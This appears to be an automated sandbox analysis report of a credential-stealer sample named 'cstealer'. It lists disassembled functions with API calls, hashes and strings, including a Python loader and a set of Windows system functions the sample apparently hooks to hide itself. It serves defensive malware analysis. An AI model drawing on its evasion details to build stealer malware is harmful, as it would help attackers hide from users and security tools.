                                                                                                                                                            Function 00007FF6957FB3CC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                                                                                                                            • Instruction ID: ff5072309d7d45a0b5e2e6ac79323c9942986b5feac1f9f276ea43900ae4f00f
                                                                                                                                                            • Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                                                                                                                            • Instruction Fuzzy Hash: AC315036608B8185E770DF25E8442EE73A4FB88B94F540176EA9D87B94EF3CD6458B00
                                                                                                                                                            Function 00000271DC67D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction ID: 8d74fd7fe591eacc9f86bf1893a7a89fa3646e460c99804f6260bc516c8545e3
                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction Fuzzy Hash: C2315172219B808AEB70CFA9E84439E73A4FB89754F500925EB9D47B94EF38C565CF00
                                                                                                                                                            Function 00007FF6958026C4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                            • Opcode ID: d3b5a9ccb4e88c159cf9a045586edc927c7d7f7f2097a371a70039bbbe86ddba
                                                                                                                                                            • Instruction ID: 3c868de219bbddd9ed03fd26d0da392749f704c56294911123bac0f26b316cd9
                                                                                                                                                            • Opcode Fuzzy Hash: d3b5a9ccb4e88c159cf9a045586edc927c7d7f7f2097a371a70039bbbe86ddba
                                                                                                                                                            • Instruction Fuzzy Hash: ACB1AF26B1A6A641EE71DB35DA006F963D1EB44FE4F444173EE5E87B89DEBCE8418300
                                                                                                                                                            Function 00007FF695806DCC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806DFA
                                                                                                                                                              • Part of subcall function 00007FF695806548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69580655C
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806E0B
                                                                                                                                                              • Part of subcall function 00007FF6958064E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6958064FC
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806E1C
                                                                                                                                                              • Part of subcall function 00007FF695806518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69580652C
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: HeapFree.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB716
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: GetLastError.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB720
                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69580705C), ref: 00007FF695806E43
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3458911817-0
                                                                                                                                                            • Opcode ID: 55e3cc8bac5369d910ed4892b15b2a588c4a2811a75c0baad495c27a87ccf3ce
                                                                                                                                                            • Instruction ID: b4e0906300c28ed5b119b6432cb6919ee731fb3e14402f1c0b75f00060dd7909
                                                                                                                                                            • Opcode Fuzzy Hash: 55e3cc8bac5369d910ed4892b15b2a588c4a2811a75c0baad495c27a87ccf3ce
                                                                                                                                                            • Instruction Fuzzy Hash: 91516F72A1966286E730DF32EA811E9A7E0FF48F84F4441B6EA4DC7695DF3CE8418750
                                                                                                                                                            Function 00000271DC677960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction ID: 250e34395ab81a5c595c50e6da9b4650fc3d02a78714bafce1ce502a16152bfb
                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction Fuzzy Hash: 48115E72715F018EEF10CFA8E8593A933A4FB19758F440E21EB6D467A5DF78C1A88780
                                                                                                                                                            Function 00000271DC67DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                            • Instruction ID: 9d4ba4bfcc8f1e7e0d1dbcd0bd423141c702a5298d6a41c17131bbc341101cd1
                                                                                                                                                            • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                            • Instruction Fuzzy Hash: 6C51B3327096808DFF309FBAA94879A7BA5BB44794F144D15EE5C27FD5EA38C425CB00
                                                                                                                                                            Function 00000271DC6536F0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                            • Instruction ID: d22bc305dbd5f7ce225b4f605fc8fde636dcf19937e4989c7c663fcfcb8e9ca5
                                                                                                                                                            • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                            • Instruction Fuzzy Hash: 28F062B17292948FDBA98F6CA80671A77E1F708380FD08469D6CD83B04D63C8060CF04
                                                                                                                                                            Function 00007FF6957ECA9C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                                                                                                                            • Instruction ID: 656790d11d6094e284f15c35b931dd6f6c50fb71ff2bf6567e6383014573eafe
                                                                                                                                                            • Opcode Fuzzy Hash: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                                                                                                                            • Instruction Fuzzy Hash: A1A00165919952D0E6749B10A9560B062A4EB51B08B4100B2D02E954A09E3CA9458300
                                                                                                                                                            Function 00007FF6957E53F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                            • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                            • API String ID: 190572456-4266016200
                                                                                                                                                            • Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                                                                                                                            • Instruction ID: b6d85abd710de6182123d4eb57af4eaff86aefd07679e4d4f3b61590801c4ed6
                                                                                                                                                            • Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                                                                                                                            • Instruction Fuzzy Hash: 3512C065A0FB2790FB75DB24AA941F423E1EF05F55B5454B6D80E8A3A4EF7CBE488300
                                                                                                                                                            Function 00000271DC6712BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction ID: 525f12fe7fea4898394b34cf501151e69b70c52a1fd7d241e78888ee5a7812d7
                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction Fuzzy Hash: 1C516272205B448AEB60CFAAE54835B77A1FB88F85F444525DB4E07B99EF3CC065CB00
                                                                                                                                                            Function 00007FF6957E1700 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                            • API String ID: 2030045667-3833288071
                                                                                                                                                            • Opcode ID: 263c3a39bbe89d09fcae742a522d57215d3d8a93d8e70c9f31ee8f05d866201c
                                                                                                                                                            • Instruction ID: f2713b426959d4a3671fb8d8d6a14f6e267ddd74ed464b7eb4e59a16f9dd6c3c
                                                                                                                                                            • Opcode Fuzzy Hash: 263c3a39bbe89d09fcae742a522d57215d3d8a93d8e70c9f31ee8f05d866201c
                                                                                                                                                            • Instruction Fuzzy Hash: DE517B61B0978286EB309B25E5562F9A3D1FF45FD4F4440B2DE4DCB6A5EE6CEA48C300
                                                                                                                                                            Function 00000271DC671D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction ID: 4531d0168b37ae59c167cf0243d09ffc4f1335f1b5287f9d9daaa4c8f1a5e577
                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction Fuzzy Hash: DD31B7B410B90AE8EE26EFEDE8697D52360BF04744F900D53D44D12BE1AE3C8269CF60
                                                                                                                                                            Function 00000271DC646910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: 602f0d8ba35c23c5c9fc0ca8855d52922af5ae43ebffbd69c8650dcd1cbf8e53
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: 2C81EF7161F6418EFA70AFED944C399B792AF85780F148C259B0D43796EB78C8B68F00
                                                                                                                                                            Function 00000271DC67CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32 ref: 00000271DC67CE37
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CE4C
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CE6D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CE9A
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CEAB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CEBC
                                                                                                                                                            • SetLastError.KERNEL32 ref: 00000271DC67CED7
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF0D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,00000271DC67ECCC,?,?,?,?,00000271DC67BF9F,?,?,?,?,?,00000271DC677AB0), ref: 00000271DC67CF2C
                                                                                                                                                              • Part of subcall function 00000271DC67D6CC: HeapAlloc.KERNEL32 ref: 00000271DC67D721
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF54
                                                                                                                                                              • Part of subcall function 00000271DC67D744: HeapFree.KERNEL32 ref: 00000271DC67D75A
                                                                                                                                                              • Part of subcall function 00000271DC67D744: GetLastError.KERNEL32 ref: 00000271DC67D764
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF65
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF76
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction ID: b1520f05b3cb90a356aebe994484967ae7a153129be9054fa1cd9836e56d08ac
                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction Fuzzy Hash: 4941583020F6446DFE78AFFD555D7A922825F947B0F240F24A93E46BE6FE2884719E01
                                                                                                                                                            Function 00007FF6957E12A0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message_fread_nolock
                                                                                                                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                            • API String ID: 3065259568-2316137593
                                                                                                                                                            • Opcode ID: 10be7354ae7ed2204115d902d03c55829f90979370bef0a99dab41979069eecf
                                                                                                                                                            • Instruction ID: 15fde05d5233a79c4f92457ce111f515aae73b55e88589291479c972fdb792b2
